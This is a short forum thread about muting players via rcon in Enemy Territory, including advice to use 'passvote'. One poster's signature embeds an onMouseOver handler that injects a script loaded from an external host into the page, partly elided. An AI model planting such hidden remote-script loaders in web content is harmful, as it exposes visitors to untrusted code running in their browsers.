Rcon muting
Hi all. Is there a way to mute/unmute via rcon? I've searched high and low and can't find anything on this. Thanks!
Re: Rcon muting
Well, you're supposed to be able to use several referee commands from the server console as well, so e.g. rcon ref mute <#> is what you're after... Unfortunately, that's broken in vanilla ET. It's fixed in the ET Pro release that's just around the corner, though...Izrafiil wrote:Hi all. Is there a way to mute/unmute via rcon? I've searched high and low and can't find anything on this. You can currently force a vote to mute a client to pass immediately with the "passvote" command, though, if that's any help.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Yeah, that should work...Izrafiil wrote:Thanks Rain. For some reason I can't get the passvote option to work either. Whats the correct syntax for that? /rcon passvote ?
